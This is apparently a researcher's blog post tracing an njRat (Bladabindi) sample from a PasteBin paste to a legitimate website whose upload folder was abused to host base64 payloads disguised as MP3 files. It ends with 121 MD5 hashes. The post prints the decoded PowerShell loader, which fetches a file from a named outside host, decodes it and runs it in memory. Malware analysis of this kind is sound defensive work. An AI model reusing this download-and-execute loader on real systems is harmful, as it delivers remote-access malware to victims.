Can you listen to Base64 ?

Lately I have been interested in PasteBin as a source of malware. Before I continue, if you are on twitter, @scumbots by @pmelson does it way better then I do it 🙂 But still, I am having fun and wanted to describe a process I am doing frequently with concrete example.

I was on my cell phone in a waiting room when @scumbots tweeted that it had found an njRat instance on the paste myXAXSKh.

As you can see in the screenshot this looks like char codes separated by a caret, but not quite the MZ magic bytes… so I was curious, and was trying to use CyberChef from my cell phone with only the first few chars, and it never returned an MZ header. Anyhow, as much as Cyberchef is a great tool, using it on a cell phone was not ok.

When I got home, I tried the code in CyberChef using this recipe:

So It changed the following text from the Paste:

57^77^42^42^41^48^41^41^63^41^42^45^…

to :

[AppDomain]::CurrentDomain.Load([Convert]::
Frombase64String((New-Object
System.Net.WebClient).Downloadstring
('http://www.asmreekasounds.com/upfiles/up_down/5de74b4422b036f72bec452a21974406.mp3')))
.EntryPoint.invoke($null,$null)

Not quite was I was expecting. Most of the time, miscreants are lazy and will just simply Base64 their payload into a Paste, or into a simple script that they download, and then decode the base64 to a exe.

Nevertheless, this was still interesting, it was downloading a file with an MP3 extension to decode from Base64, I had to check what was the content of that file, so I downloaded with wget, and sure thing It contained base64 code, that once decoded would output an EXE file with MD5: d2635eea6c889ee9f341e3acaf92c152 .

A quick look into VT shows its detection and what seems to be a common threat name “Bladabindi” which is AKA njRat.

I always have a look for opendir, and this folder was indeed the case. An open directory with tons of MP3…or malware should I say.

This seemed liked a legit website with an upload feature being abused.

Quick translation seems to show that you can only upload files with the following extensions: “.rar, .mp3, .wav, .wma”, but does not seem to check for content type, and this would make it an Unrestricted file upload vulnerability according to OWASP.

Further researching the uploaded files, I soon discovered there was more of those base64 disguised in mp3 payload. I downloaded them all and found all types of text.

I found some Triple Base64 Executable, some double, some base64 with specific chars replaced, decimal encoded executables, some executables disguised in Hex after being base64 etc… you see the pattern, lots of layers of encoding. Nothing some regex and python cant handle.

In the end, I discovered 121 Exe’s, out of those, only 17 were already on Virustotal. There is more then encoded Exe, like PHP script, powershell etc…

Needless to say that I uploaded all the files to VT. Here is the list of MD5 for those discovered exe:

0106229044bc169c34921d8e7dbba9c9
03e35aa252a9812ba83cd8710799bc54
06676e2cbddc93ca759c2d4d270ae8d3
067f398e883b2da133977a796c5e94c3
077564f81c311d37f27424c058b130a6
09c0839607878047a8f57b293d9cc933
0e7b90c3c68e3cbbfbcbf55d54e99b7e
10456c5073b56e2ca51966a18a39054a
17a6709047f8295ec2d494fafcefd21d
1e1e89ec23f1757010376f9a89c3361e
1ea820ddbb58bdab0bdb3b0ac1d91ecc
1ec4af14368aaf8e419861147d39a2fe
1fafdb34be9427c0a3212dec8c0b74ae
2363f4f010e50498ffd2a66239e02a17
2447cad2bfc81354dedb022c382bd76e
2814bb696538e341c96a549e82c87857
287ccf62cf6cfe640408bc26c022b2e4
2999404c7f69dfa008e3300e772bd43b
33628565d4ba2eb203330721470d5868
34c0bf7fcf67cf5918a40a3861f7109f
35090d34410e61c38281173a83b2ef39
37ce57c74b8b00bf0149d4d65a9c80e9
386e412b57afd2a1ad321932bbbc78d5
3b0052bdb59e70ab6eb96f33c533c687
3bc03d5287d125e8fcb586b13cff98e1
3c0d927634e09d80dae0335b8e9b9b19
3dba585b7828876b6af95599b9802333
3e90879fccc0a341f984362ea2197744
3ea1a8e3b8ec71c4bf4c516958eb255d
3f98be3634b88ae1fcc042b42d040e89
419a5bfa469eb4504c36539f944ea828
41d952b79efad76860b0d91d20b425b4
42e101194909f63a1205d698477e3e0b
453b3fa00531cb58ef304e639680c71c
46eaaa7f3bfe65fd921e1555d87a1459
4735979583822605c13e8d42fb566b00
4aa9ca82a100c2e692b9ca257b1b9380
4b297d0c1d25ae7117bf65b4b53cc1a8
4cf5fd7a8f5a6bec069196daf7862ee3
5066ea87129db329aeffd4594cb6dbc4
5146a9828c4c95482bcffa9a62f6ad73
51e8719c7a03bfb448b33ce74df137d6
53272041964d3e2b680942074234188b
54cb91395cdaad9d47882533c21fc0e9
56bcac797486a2f2841083659b1668f8
573d1a7a5a4a7c5e6c78522740a4b5c4
57ef3704f5eb3e93fb58e483d9fe9cda
5bf7e0e00dd8d17c6ff8eb9ac4f0a01a
5db37525e8469100e3f19a2d2dfab2ff
602bea50a2dae0b33c592e36f0493ac5
62213f9d5c8841b6f5b8afd9bdc28ee0
625c3173bc62fe93942412fa4b0fb696
6411118dc5160de54ec10f5dda7002a6
64598f18e353f9c56eee5e1d30f76439
6afa7e02e03588692c62bfeeed86a67d
6e6b9dbfadb310faaa64867204d76f82
7372785adcc4556884d6442ffe3fe782
792f6cbf046b1dd0277b864598027bbc
79d405b85ca8a9960f49836088156844
7e9a7b8cc341a3e5c84410df0e39e647
8071ab417eb062de88fcdc722c09ec83
80c0ede0107eb91ce270457403809dd1
81a33185d99ad999b09b0506dd4fe0ee
82e094d6343e52f38df9203dd0db3bed
83de198861917b25cf676597189fcd1e
877f13b2fe1e60af8efaf0b28aa7d8b2
88677560b99ffe660b25b95d7b7dae7d
8962cd09b754dbfae1c7d88da193265a
89a0efbbe93b9928f379986f022634b6
8ab1876322022153188fb02fd73f72ae
8c1d054e75c05478e8c4a822cad4f8f7
9018a001dea96cac92d931bd48fce801
929e9d4545e63d0c33584d38ad53d658
9869c642c417173985e411a2f178d461
9ccb0d0071c02a8404b148acf9c534fc
9e6446b087bdaf822df230fd8eb1b715
9e99a0305141893a850bd0c89004439b
a1616d68ec4a0ca966a15c32c14426c3
a19257e8655754ded9adc4cf201707c8
a5762ded8111aa232a8ffb1de31f2e90
acb4e54e54a57d6b1404e10c2d4b4477
afa769806da434adaf76da9f5cf245f3
b1909a9479db3963822a133399cf4731
b334910ad32f2dd093174434afdf7dce
b55f7ac283c497162e51bd33bd61688c
b560c1bdc7dca63f41a4eb90eb3657e8
b7174917c43da704e4a2131d656a9221
b7f2b7541f365d78889b9fe3a81e0bad
bb2b5b5d34172c40c37f13a14a0089bd
bb5b47697a955332a1b3bd0fd00b0284
bf6c2e81172691cbb264142e29817b6e
c14820b567bd99399202226d6aa2b4bf
c3c7ca020f0631db2ddcfba49cef4ae2
c43346b3584a9c055463d1198800335f
c7a0479e8d351372bd93ca9c1f391320
c9c343ebcadf0cd3209c409bbb6ebb8d
cbeaa6f8ff679285822bde1b52c5e62f
cd542627ab037e6ea592af28d28f2dbb
ce9dc231fde6a489e9df5f5b243800d3
d2635eea6c889ee9f341e3acaf92c152
d31ce02c04935d0642d5aab3c0ff371b
d4b4f71454281f2d8a63c41feef8be35
d6c0f4057b6a588bfa59aeb7df78b0f8
d75ea59fef6a9ff58a5cc69e16550d8b
dc32a95818b45896a6ec11b1f56d4bfb
dd15159f4aa512aeae592bc465107693
dd37d79acd770c57d13e4b15bcecfd1f
e232d1b59457269f5cdaabe22141a6a1
e3338bfce074d7dbe23eba4e15043840
e5adf6a554abf5c9f1694265d0809ff0
e71904d8399cd94183bfacfb40e5cdfa
e8cac085008f267529f1f43186d1ab4e
efe3204a944124613ee02d68e6423399
f42365ec2627b872e1624d252991bb59
f5cc7602c09212ca86bb50576a02604e
f615272245fbf6770271fb4eca791b4d
f96329cb2ce6550ab40a2673f49a3e76
f986fb700c232cf44f429b5cf5cc56e2
fbc2273f5f3099445508c95a936da8cc
fcb97d4d2b8fa0cc7a156aa2b39db5d6
fe8da6b7adb9834bf20877b3e8b1c1fe

The following Zip (MD5: 98bc4db3c23b6d45326251ec6f2d3941) contains all 121 files.

Leave a Reply

Your email address will not be published. Required fields are marked *